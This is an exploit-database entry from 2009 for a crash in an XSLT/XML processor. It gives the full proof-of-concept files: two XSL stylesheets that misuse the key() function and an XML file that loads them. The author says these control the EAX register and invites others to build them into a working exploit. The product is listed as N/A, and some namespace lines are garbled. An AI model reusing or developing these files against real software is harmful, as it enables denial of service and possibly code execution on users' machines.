header-logo
Suggest Exploit
vendor:
N/A
by:
DATA_SNIPER
7.5
CVSS
HIGH
Code Manipulation Vulnerability
20
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

XSLT.XSL and XMLCrash.XML Code Manipulation Vulnerability

A code manipulation vulnerability exists in the XSLT.XSL and XMLCrash.XML code. An attacker can manipulate the code to change the EAX value from 00000000 to 00000031 or 017ED9A0, which can lead to a crash.

Mitigation:

N/A
Source

Exploit-DB raw data:

-------------
by DATA_SNIPER
GREETZ TO THE FOUNDER ;)
fore more information and bug analyses:
http://www.at4re.com/f/showthread.php?p=47560
i tray to manipulate the POC for new idea,you now that the call is calling invalid address [00000000]
so i can change it to [00000031] ,i konw it's usless but it can make diffrent when some smart  can exploit it by changing some things in the exploit.
and the second code  change the EAX to 017ED9A0.
xslt.xsl code EAX=00000031:
<?xml version="1.0" encoding="UTF-8"?>

http://www.w3.org/1999/XSL/Transform">

    <xsl:key name="label" match="item1" use=""/>

    <xsl:template match="root">
                   <xsl:for-each select="key('label', @item1)">
                </xsl:for-each>
    </xsl:template>

</xsl:stylesheet>
xslt.xsl code EAX=017ED9A0:
<?xml version="1.0" encoding="UTF-8"?>

http://www.w3.org/1999/XSL/Transform">

    <xsl:key name="label" match="item1" use=""/>

    <xsl:template match="root">
                   <xsl:value-of select="key('label', @item1)">
                </xsl:value-of>
    </xsl:template>
</xsl:stylesheet>

xmlcrash.xml code:

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="xslt.xsl"?>
http://www.w3.org/2001/XMLSchema-instance">
    <item1 id="datasniper" />
</root>

# milw0rm.com [2009-04-06]